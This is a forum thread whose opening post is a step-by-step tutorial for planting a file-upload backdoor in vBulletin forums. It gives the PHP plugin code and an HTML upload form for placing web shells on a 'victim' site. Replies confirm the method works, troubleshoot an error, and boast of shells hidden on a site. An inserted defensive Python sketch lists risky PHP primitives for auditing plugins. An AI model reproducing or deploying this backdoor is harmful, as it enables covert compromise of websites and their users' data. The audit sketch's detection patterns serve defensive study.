IT Security and Insecurity Portal

Uploading a Shell to vBulletin[All Versions]

Posted: Wed Dec 31, 2008 12:46 am
Lymon (Beginner)
Joined: Sep 26, 2008
Posts: 2

Uploading Shells to vBulletin Forums via ACP
Things you'll need:
• Administrator Account Capable of Making Plugins
• An HTML Enabled Forum
• Or Template editing abilities.
• Folder chmod 777 for uploading. I used (images/avatars).
First things first, log in to the Admin control panel.
Then scroll down on the side until you see Plugins and Products.
Select New Plugin and you should get something like:
For the Hook Location, select Ajax_Complete.
The Title isn't important, name it whatever you want.
Execution order should be 5.
And the code will be as follows:
Code:
$target_path = "images/avatars"; //edit this to your directory that is 777
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file ". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
And finally set the plugin as active.
It should be as follows:
Once you've saved, visit
http://victim.com/forums/ajax.php
You should get a "No input File Specified" message. If you get that, then you can continue; if not, retry the first few steps!
~~~~~~~~~~~~~~~~~~Part 2~~~~~~~~~~~~~~~~~~~~~~~~~
You're almost done!
Next we need a place where we can choose the file to upload...hmmm
Let's try good ol' HTML
Code:
<form enctype="multipart/form-data" action="ajax.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="hidden" name="s" value="$session[sessionhash]" />
<input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" />
<input type="submit" value="Upload File" />
</form>
Place that anywhere on the site where HTML is enabled OR edit the Template and BAM, you have yourself a way to upload the shell, OR any other file for that matter.
Tutorial By: Lymon
Please do not re-distribute without my permission.
Thanks & Good Luck!
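
Seen from the defender's side, the steps in the post above leave two artefacts: a plugin record whose PHP handles uploads, and script files inside a world-writable upload directory. The following audit sketch is an added example, not part of the original post; the record field names, sample rows and file paths are constructed assumptions.

```python
import re
from pathlib import PurePosixPath

# Constructed sample data. Field names and paths are assumptions for this example.
SAMPLE_PLUGINS = [
    {"title": "Prefix colours", "hookname": "forumdisplay_complete", "active": 1,
     "phpcode": "$show['prefix'] = true;"},
    {"title": "stats", "hookname": "ajax_complete", "active": 1,
     "phpcode": "move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path);"},
    {"title": "old test", "hookname": "global_start", "active": 0,
     "phpcode": "// eval(base64_decode($x));"},
]
SAMPLE_FILES = ["images/avatars/avatar12_3.gif", "images/avatars/upload_test.php",
                "images/avatars/logo.php.jpg", "includes/functions.php"]

# PHP primitives that let plugin code accept uploads, write files or run code.
RISKY = {
    "file-upload": re.compile(r"\$_FILES\b|\bmove_uploaded_file\s*\(", re.I),
    "file-write": re.compile(r"\b(?:file_put_contents|fwrite|fopen|copy)\s*\(", re.I),
    "code-exec": re.compile(r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen)\s*\(", re.I),
    "decoder": re.compile(r"\b(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}
SCRIPT_EXT = {".php", ".php5", ".phtml", ".phar"}

def audit_plugins(plugins):
    """Flag plugin records whose PHP uses risky primitives; active ones first."""
    findings = []
    for p in plugins:
        reasons = sorted(n for n, rx in RISKY.items() if rx.search(p["phpcode"]))
        if reasons:
            findings.append({"title": p["title"], "hookname": p["hookname"],
                             "severity": "high" if p["active"] else "review",
                             "reasons": reasons})
    return sorted(findings, key=lambda f: f["severity"] != "high")

def scripts_in_upload_dirs(paths, upload_dirs=("images/avatars",)):
    """Return files under writable upload directories that carry a script
    extension anywhere in the name (a name like logo.php.jpg counts too)."""
    hits = []
    for raw in paths:
        path = PurePosixPath(raw)
        in_upload_dir = any(PurePosixPath(d) in path.parents for d in upload_dirs)
        if in_upload_dir and SCRIPT_EXT & {s.lower() for s in path.suffixes}:
            hits.append(raw)
    return hits

if __name__ == "__main__":
    for f in audit_plugins(SAMPLE_PLUGINS):
        print(f["severity"], f["hookname"], f["title"], ",".join(f["reasons"]))
    print(scripts_in_upload_dirs(SAMPLE_FILES))
```

The pattern lists are a starting point for triage, not a complete signature set; any plugin that was not installed by a known administrator deserves manual review regardless of what it matches.
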

Posted: Wed Dec 31, 2008 1:13 am
r00tfate1 (Beginner)
Joined: Dec 31, 2008
Posts: 1

Yep, I've used it before, it works like a charm.
This probably works on other forums as well.

Posted: Wed Dec 31, 2008 6:30 am
tehhunter (Valuable expert)
Joined: Nov 19, 2008
Posts: 261

Great post, I'll refer others to it.

Am getting below error.

Posted: Wed Apr 15, 2009 6:38 am
transfer (Regular user)
Joined: Apr 14, 2009
Posts: 11

Am getting below error.
Parse error: syntax error, unexpected '<' in /home/XXXXX/public_html/ajax.php(754) : eval()'d code on line 1
Anyone guide me..
Thanks in advance

Posted: Wed Apr 15, 2009 5:39 pm
-AO- (Advanced user)
Joined: Jul 15, 2008
Posts: 205
Location: United States

You didn't wrap the PHP code with <? ?>, did you? If you did, take them off...

Posted: Thu Apr 30, 2009 10:33 pm
Overhit (Beginner)
Joined: Apr 30, 2009
Posts: 3

Works wonderfully for me, I have 15 shells hidden on this site, and 4 remote uploaders hidden in the site.